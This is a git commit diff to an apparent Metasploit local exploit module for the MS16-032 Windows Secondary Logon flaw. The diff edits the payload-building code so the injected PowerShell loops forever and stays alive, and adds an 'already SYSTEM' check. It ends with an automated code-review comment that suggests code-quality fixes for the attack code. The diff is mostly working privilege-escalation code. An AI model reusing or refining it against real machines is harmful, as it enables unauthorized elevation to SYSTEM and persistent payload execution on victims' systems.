Fix Payload exit issue
Fixed the payload-exit issue by adding a `while ($true){Start-Sleep 1000};` statement.
This commit is contained in:
parent
40d7de05ef
commit
7211936f96
|
@ -12,7 +12,10 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
Rank = NormalRanking
|
||||
|
||||
include Msf::Exploit::Powershell
|
||||
include Msf::Post::Windows::Priv
|
||||
include Msf::Post::Windows::Process
|
||||
include Msf::Post::File
|
||||
include Msf::Post::Windows::ReflectiveDLLInjection
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
|
@ -83,7 +86,9 @@ This module exploits the lack of sanitization of standard handles in Windows' Se
|
|||
end
|
||||
|
||||
def exploit
|
||||
|
||||
if is_system?
|
||||
fail_with(Failure::None, 'Session is already elevated')
|
||||
end
|
||||
arch1 = check
|
||||
if arch1 == nil
|
||||
print_error("Architecture could not be determined.")
|
||||
|
@ -95,6 +100,7 @@ This module exploits the lack of sanitization of standard handles in Windows' Se
|
|||
vprint_status("PS1 loaded from #{ps_path}")
|
||||
ms16_032 = File.read(ps_path)
|
||||
cmdstr=expand_path('%windir%') << '\\System32\\windowspowershell\\v1.0\\powershell.exe'
|
||||
|
||||
if datastore['TARGET'] == 0 && arch1 == ARCH_X86_64
|
||||
cmdstr.gsub!("System32","SYSWOW64")
|
||||
print_warning("Executing 32-bit payload on 64-bit ARCH, using SYSWOW64 powershell")
|
||||
|
@ -106,7 +112,7 @@ This module exploits the lack of sanitization of standard handles in Windows' Se
|
|||
payl.sub!(/.*?(?=New-Object IO)/im, "")
|
||||
payl = payl.split("';$s.")[0]
|
||||
payl.gsub!("''","'")
|
||||
payl = "$s=#{payl}"
|
||||
payl = "$s=#{payl}while($true){Start-Sleep 1000};"
|
||||
|
||||
@upfile=Rex::Text.rand_text_alpha((rand(8)+6))+".txt"
|
||||
path = datastore['W_PATH'] || pwd
|
||||
|
@ -146,7 +152,6 @@ This module exploits the lack of sanitization of standard handles in Windows' Se
|
|||
rescue
|
||||
print_error("An error occurred executing the script.")
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
def cleanup
|
||||
|
@ -161,5 +166,4 @@ This module exploits the lack of sanitization of standard handles in Windows' Se
|
|||
print_error("There was an issue with cleanup of the powershell payload script.")
|
||||
end
|
||||
end
|
||||
|
||||
end
|
||||
|
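Review bot: The loop appended in the fourth hunk, `payl = "$s=#{payl}while($true){Start-Sleep 1000};"`, never terminates, so the powershell.exe started by this module keeps running after the session is gone, while `cleanup` in the last two hunks only reports on the payload script file and does not address the lingering process. A why-comment above that line would help the next reader, e.g. `# keep the powershell host alive; without the loop the script ends and the payload exits with it`, and the long-lived process should be recorded as a side effect in the module metadata alongside the on-disk script. The interpolation also puts `while` directly after `#{payl}` with no `;`, which presumably relies on the text kept before `';$s.` ending in a statement terminator — worth confirming in a comment or adding an explicit `;` so the assembled script does not depend on the generator's trailing characters. In the second hunk, `if arch1 == nil` reads more idiomatically as `if arch1.nil?`; note that the `exploit` method body continues beyond that hunk.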
|